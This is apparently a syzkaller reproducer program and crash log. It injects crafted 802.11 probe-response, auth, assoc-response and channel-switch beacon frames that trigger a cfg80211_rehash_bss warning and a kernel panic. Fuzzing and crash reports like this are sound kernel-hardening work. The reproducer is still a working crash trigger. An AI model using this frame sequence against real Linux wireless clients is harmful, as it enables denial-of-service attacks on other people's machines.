program: r0 = socket$nl_generic(0x10, 0x3, 0x10) r1 = syz_genetlink_get_family_id$nl80211(&(0x7f0000000080), 0xffffffffffffffff) ioctl$sock_SIOCGIFINDEX_80211(r0, 0x8933, &(0x7f00000000c0)={'wlan1\x00', 0x0}) sendmsg$NL80211_CMD_SET_INTERFACE(r0, &(0x7f0000000100)={0x0, 0x0, &(0x7f0000000140)={&(0x7f0000000180)={0x24, r1, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r2}, @void}}, [@NL80211_ATTR_IFTYPE={0x8, 0x5, 0x2}]}, 0x24}}, 0x0) sendmsg$NL80211_CMD_CONNECT(r0, &(0x7f00000001c0)={0x0, 0x0, &(0x7f0000000380)={&(0x7f0000000240)={0x30, r1, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r2}, @void}}, [@NL80211_ATTR_SSID={0xa, 0x34, @default_ap_ssid}, @chandef_params=[@NL80211_ATTR_WIPHY_FREQ={0x8}]]}, 0x30}}, 0x0) r3 = socket$kcm(0x2d, 0x2, 0x0) sendmmsg(r3, &(0x7f00000004c0)=[{{&(0x7f0000000080)=@nfc_llcp={0x2d, 0x0, 0x10000000, 0x7, 0x4, 0x7, "47af57ce8c8e5af84d109ee7a1488bd8c3df97e87f7e771f69ced4c5de6ddeb44ee59bdfb62866129f1338dba84b5d82a121c369a6837123e849c909c16b53", 0x2d}, 0x80, 0x0}}], 0x1, 0x8000) syz_80211_inject_frame(&(0x7f00000002c0)=@device_b, &(0x7f0000000000)=@mgmt_frame=@probe_response={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x20}}, 0x0, @random=0x4, 0x1, @val={0x0, 0x6, @default_ap_ssid}, @val={0x1, 0x1, [{0x2, 0x1}]}, @void, @void, @void, @void, @void, @val={0x71, 0x7, {0x1, 0x1, 0xffffffffffffffff, 0x0, 0xffffffffffffffff, 0xf3}}}, 0x38) nanosleep(&(0x7f0000000340)={0x0, 0x2faf080}, 0x0) syz_80211_inject_frame(&(0x7f00000003c0)=@device_b, &(0x7f0000000400)=@mgmt_frame=@auth={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x1}}, 0x0, 0x2, 0x0, @void}, 0x1e) syz_80211_inject_frame(&(0x7f00000004c0)=@device_b, &(0x7f0000000500)=@mgmt_frame=@assoc_resp={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x2}}, 0x1, 0x0, @default, @val, @void}, 0x20) syz_80211_inject_frame(&(0x7f0000000300)=@device_b, &(0x7f00000008c0)=@mgmt_frame=@beacon={{{}, {}, @device_b, @device_b, @from_mac}, 0x0, @default, 0x1, @void, @void, @void, @void, @void, @val={0x5, 0x3, {0x7c, 0x20, 0x8}}, @val={0x25, 0x3, {0x0, 0x2, 0x4}}, @val={0x2a, 0x1, {0x1, 0x1}}, @val={0x3c, 0x4, {0x0, 0x3d, 0xab, 0x5}}, @val={0x2d, 0x1a, {0x8, 0x3, 0x1, 0x0, {0x5, 0x9, 0x0, 0x6, 0x0, 0x1, 0x0, 0x0, 0x1}, 0x6, 0x4, 0x5}}, @void, @val={0x71, 0x7, {0x0, 0x1, 0x0, 0x0, 0x0, 0x2, 0x21}}, @val={0x76, 0x6, {0x0, 0x9, 0x3d, 0x1}}}, 0x64) syz_usb_connect$hid(0x0, 0x36, &(0x7f0000000340)=ANY=[@ANYBLOB="12013f00000000407f04ffff0000000000010902"], 0x0) syz_80211_inject_frame(&(0x7f0000000300)=@device_b, &(0x7f0000000440)=@mgmt_frame=@beacon={{{}, {}, @device_b, @device_b, @from_mac}, 0x0, @default, 0x0, @val={0x0, 0x6, @default_ap_ssid}, @void, @void, @val={0x4, 0x6, {0xe, 0x0, 0x1000, 0x5}}, @void, @val={0x5, 0x3, {0x7c, 0x20, 0x8}}, @val={0x25, 0x3, {0x0, 0x2, 0x4}}, @val={0x2a, 0x1, {0x1, 0x1}}, @val={0x3c, 0x4, {0x0, 0x3d, 0xab, 0x5}}, @void, @void, @val={0x71, 0x7, {0x0, 0x3, 0x0, 0x0, 0x0, 0x2, 0x21}}, @val={0x76, 0x6, {0x0, 0x9, 0x3d, 0x1}}}, 0x58) [ 74.486669][ T4677] Bluetooth: hci0: command tx timeout [ 74.598865][ T5331] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 74.632496][ T795] wlan1: authenticate with 08:02:11:00:00:00 (local address=08:02:11:00:00:01) [ 74.636324][ T795] wlan1: send auth to 08:02:11:00:00:00 (try 1/3) [ 74.654928][ T38] wlan1: authenticated [ 74.657200][ T5331] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 74.662233][ T38] wlan1: associate with 08:02:11:00:00:00 (try 1/3) [ 74.666281][ T38] wlan1: RX AssocResp from 08:02:11:00:00:00 (capab=0x1 status=0 aid=1) [ 74.671213][ T5331] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 74.675672][ T38] wlan1: associated [ 74.680053][ T38] wlan1: cannot understand ECSA IE operating class, 61, ignoring [ 74.684495][ T5331] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 74.948223][ T795] usb 5-1: new high-speed USB device number 2 using dummy_hcd [ 75.100953][ T795] usb 5-1: config 0 has no interfaces? [ 75.103444][ T795] usb 5-1: New USB device found, idVendor=047f, idProduct=ffff, bcdDevice= 0.00 [ 75.107301][ T795] usb 5-1: New USB device strings: Mfr=0, Product=0, SerialNumber=0 [ 75.118488][ T795] usb 5-1: config 0 descriptor?? [ 75.324409][ T38] wlan1: cannot understand ECSA IE operating class, 61, ignoring [ 75.328088][ T38] ------------[ cut here ]------------ [ 75.330348][ T38] WARNING: net/wireless/scan.c:1666 at cfg80211_rehash_bss+0x1e6/0x540, CPU#0: kworker/u4:3/38 [ 75.334571][ T38] Modules linked in: [ 75.336376][ T38] CPU: 0 UID: 0 PID: 38 Comm: kworker/u4:3 Not tainted syzkaller #0 PREEMPT(full) [ 75.340542][ T38] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 75.345234][ T38] Workqueue: events_unbound cfg80211_wiphy_work [ 75.348055][ T38] RIP: 0010:cfg80211_rehash_bss+0x1e6/0x540 [ 75.350689][ T38] Code: e8 48 c1 e8 03 42 0f b6 04 30 84 c0 0f 85 33 03 00 00 ff 45 00 48 83 c4 18 5b 41 5c 41 5d 41 5e 41 5f 5d e9 bc 03 b0 00 cc 90 <0f> 0b 90 4c 8b 2c 24 4c 89 ef e8 5b eb ea f9 84 c0 74 78 e8 e2 98 [ 75.358236][ T38] RSP: 0018:ffffc900009b6f20 EFLAGS: 00010246 [ 75.360786][ T38] RAX: ffffffff8aae6b25 RBX: 0000000000000000 RCX: 0000000000000002 [ 75.364306][ T38] RDX: ffff88801eb3a4c0 RSI: 0000000000000000 RDI: 0000000000000000 [ 75.367463][ T38] RBP: ffff88801234ec68 R08: 0000000000000000 R09: 0000000000000002 [ 75.370780][ T38] R10: 0000000000000002 R11: 0000000000000002 R12: ffff8880122481a0 [ 75.374317][ T38] R13: ffff88801234f830 R14: dffffc0000000000 R15: ffff888011f3b420 [ 75.377911][ T38] FS: 0000000000000000(0000) GS:ffff88808d416000(0000) knlGS:0000000000000000 [ 75.381901][ T38] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 75.385113][ T38] CR2: 00007f9c7a1ba190 CR3: 00000000354f0000 CR4: 0000000000352ef0 [ 75.388829][ T38] Call Trace: [ 75.390323][ T38] [ 75.391598][ T38] cfg80211_update_assoc_bss_entry+0x3fa/0x6a0 [ 75.394412][ T38] cfg80211_ch_switch_notify+0x3c1/0x770 [ 75.396672][ T38] ieee80211_sta_process_chanswitch+0xb05/0x2890 [ 75.398991][ T38] ? __pfx_ieee80211_sta_process_chanswitch+0x10/0x10 [ 75.401517][ T38] ? __pfx_do_raw_spin_lock+0x10/0x10 [ 75.403837][ T38] ? __local_bh_enable_ip+0xd0/0x130 [ 75.405996][ T38] ieee80211_rx_mgmt_beacon+0x1d6f/0x3230 [ 75.408445][ T38] ? __pfx_ieee80211_rx_mgmt_beacon+0x10/0x10 [ 75.410827][ T38] ? trace_pelt_se_tp+0x39/0x120 [ 75.412960][ T38] ? __update_load_avg_se+0x751/0xbc0 [ 75.415204][ T38] ieee80211_sta_rx_queued_mgmt+0x4ed/0x4520 [ 75.417594][ T38] ? inat_get_escape_attribute+0x109/0x190 [ 75.419957][ T38] ? __pfx_ieee80211_sta_rx_queued_mgmt+0x10/0x10 [ 75.422764][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.424935][ T38] ? __pte_offset_map_lock+0x13e/0x210 [ 75.427307][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.429316][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.431312][ T38] ? kmem_cache_alloc_bulk_noprof+0x71/0x720 [ 75.433695][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.435685][ T38] ? __pfx___mutex_trylock_common+0x10/0x10 [ 75.438151][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.440016][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.442180][ T38] ? kcov_remote_start+0x49b/0x7a0 [ 75.444156][ T38] ieee80211_iface_work+0x652/0x12d0 [ 75.446264][ T38] cfg80211_wiphy_work+0x2ab/0x450 [ 75.448390][ T38] ? process_scheduled_works+0x9ef/0x1770 [ 75.451004][ T38] process_scheduled_works+0xad1/0x1770 [ 75.453500][ T38] ? __pfx_process_scheduled_works+0x10/0x10 [ 75.456007][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.458227][ T38] worker_thread+0x8a0/0xda0 [ 75.460278][ T38] kthread+0x711/0x8a0 [ 75.462443][ T38] ? __pfx_worker_thread+0x10/0x10 [ 75.465006][ T38] ? __pfx_kthread+0x10/0x10 [ 75.467109][ T38] ? _raw_spin_unlock_irq+0x23/0x50 [ 75.469592][ T38] ? __pfx_kthread+0x10/0x10 [ 75.471541][ T38] ret_from_fork+0x510/0xa50 [ 75.473648][ T38] ? __pfx_ret_from_fork+0x10/0x10 [ 75.475920][ T38] ? __switch_to+0xc9e/0x1480 [ 75.478067][ T38] ? __pfx_kthread+0x10/0x10 [ 75.480033][ T38] ret_from_fork_asm+0x1a/0x30 [ 75.482349][ T38] [ 75.483814][ T38] Kernel panic - not syncing: kernel: panic_on_warn set ... [ 75.486783][ T38] CPU: 0 UID: 0 PID: 38 Comm: kworker/u4:3 Not tainted syzkaller #0 PREEMPT(full) [ 75.490839][ T38] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 75.495464][ T38] Workqueue: events_unbound cfg80211_wiphy_work [ 75.498868][ T38] Call Trace: [ 75.500418][ T38] [ 75.501828][ T38] vpanic+0x1e0/0x670 [ 75.503961][ T38] panic+0xb9/0xc0 [ 75.505699][ T38] ? __pfx_panic+0x10/0x10 [ 75.507784][ T38] ? ret_from_fork_asm+0x1a/0x30 [ 75.509842][ T38] __warn+0x317/0x4b0 [ 75.511422][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.513498][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.515526][ T38] __report_bug+0x288/0x500 [ 75.517625][ T38] ? do_raw_spin_unlock+0x4d/0x240 [ 75.519948][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.522382][ T38] ? __pfx___report_bug+0x10/0x10 [ 75.524578][ T38] ? _ieee80211_wake_txqs+0x90a/0xa70 [ 75.526649][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.528947][ T38] ? _ieee80211_wake_txqs+0x2a/0xa70 [ 75.531324][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.533719][ T38] report_bug+0x16a/0x220 [ 75.535620][ T38] ? cfg80211_rehash_bss+0x1e6/0x540 [ 75.538061][ T38] ? cfg80211_rehash_bss+0x1e8/0x540 [ 75.540417][ T38] handle_bug+0x98/0x200 [ 75.542376][ T38] exc_invalid_op+0x1a/0x50 [ 75.544510][ T38] asm_exc_invalid_op+0x1a/0x20 [ 75.546690][ T38] RIP: 0010:cfg80211_rehash_bss+0x1e6/0x540 [ 75.548883][ T38] Code: e8 48 c1 e8 03 42 0f b6 04 30 84 c0 0f 85 33 03 00 00 ff 45 00 48 83 c4 18 5b 41 5c 41 5d 41 5e 41 5f 5d e9 bc 03 b0 00 cc 90 <0f> 0b 90 4c 8b 2c 24 4c 89 ef e8 5b eb ea f9 84 c0 74 78 e8 e2 98 [ 75.555646][ T38] RSP: 0018:ffffc900009b6f20 EFLAGS: 00010246 [ 75.557740][ T38] RAX: ffffffff8aae6b25 RBX: 0000000000000000 RCX: 0000000000000002 [ 75.560567][ T38] RDX: ffff88801eb3a4c0 RSI: 0000000000000000 RDI: 0000000000000000 [ 75.563725][ T38] RBP: ffff88801234ec68 R08: 0000000000000000 R09: 0000000000000002 [ 75.566752][ T38] R10: 0000000000000002 R11: 0000000000000002 R12: ffff8880122481a0 [ 75.570259][ T38] R13: ffff88801234f830 R14: dffffc0000000000 R15: ffff888011f3b420 [ 75.573747][ T38] ? cfg80211_rehash_bss+0xe5/0x540 [ 75.575920][ T38] cfg80211_update_assoc_bss_entry+0x3fa/0x6a0 [ 75.578735][ T38] cfg80211_ch_switch_notify+0x3c1/0x770 [ 75.581160][ T38] ieee80211_sta_process_chanswitch+0xb05/0x2890 [ 75.583995][ T38] ? __pfx_ieee80211_sta_process_chanswitch+0x10/0x10 [ 75.586918][ T38] ? __pfx_do_raw_spin_lock+0x10/0x10 [ 75.589199][ T38] ? __local_bh_enable_ip+0xd0/0x130 [ 75.591333][ T38] ieee80211_rx_mgmt_beacon+0x1d6f/0x3230 [ 75.593987][ T38] ? __pfx_ieee80211_rx_mgmt_beacon+0x10/0x10 [ 75.596553][ T38] ? trace_pelt_se_tp+0x39/0x120 [ 75.598605][ T38] ? __update_load_avg_se+0x751/0xbc0 [ 75.601033][ T38] ieee80211_sta_rx_queued_mgmt+0x4ed/0x4520 [ 75.603592][ T38] ? inat_get_escape_attribute+0x109/0x190 [ 75.606069][ T38] ? __pfx_ieee80211_sta_rx_queued_mgmt+0x10/0x10 [ 75.608780][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.610986][ T38] ? __pte_offset_map_lock+0x13e/0x210 [ 75.613395][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.615515][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.617776][ T38] ? kmem_cache_alloc_bulk_noprof+0x71/0x720 [ 75.620390][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.622549][ T38] ? __pfx___mutex_trylock_common+0x10/0x10 [ 75.625032][ T38] ? __lock_acquire+0x6b6/0x2cf0 [ 75.627100][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.629248][ T38] ? kcov_remote_start+0x49b/0x7a0 [ 75.631381][ T38] ieee80211_iface_work+0x652/0x12d0 [ 75.633617][ T38] cfg80211_wiphy_work+0x2ab/0x450 [ 75.636014][ T38] ? process_scheduled_works+0x9ef/0x1770 [ 75.638589][ T38] process_scheduled_works+0xad1/0x1770 [ 75.640828][ T38] ? __pfx_process_scheduled_works+0x10/0x10 [ 75.643275][ T38] ? do_raw_spin_lock+0x121/0x290 [ 75.645400][ T38] worker_thread+0x8a0/0xda0 [ 75.647396][ T38] kthread+0x711/0x8a0 [ 75.649175][ T38] ? __pfx_worker_thread+0x10/0x10 [ 75.651405][ T38] ? __pfx_kthread+0x10/0x10 [ 75.653468][ T38] ? _raw_spin_unlock_irq+0x23/0x50 [ 75.655550][ T38] ? __pfx_kthread+0x10/0x10 [ 75.657626][ T38] ret_from_fork+0x510/0xa50 [ 75.659780][ T38] ? __pfx_ret_from_fork+0x10/0x10 [ 75.662075][ T38] ? __switch_to+0xc9e/0x1480 [ 75.664666][ T38] ? __pfx_kthread+0x10/0x10 [ 75.667186][ T38] ret_from_fork_asm+0x1a/0x30 [ 75.669858][ T38] [ 75.671663][ T38] Kernel Offset: disabled [ 75.673440][ T38] Rebooting in 86400 seconds..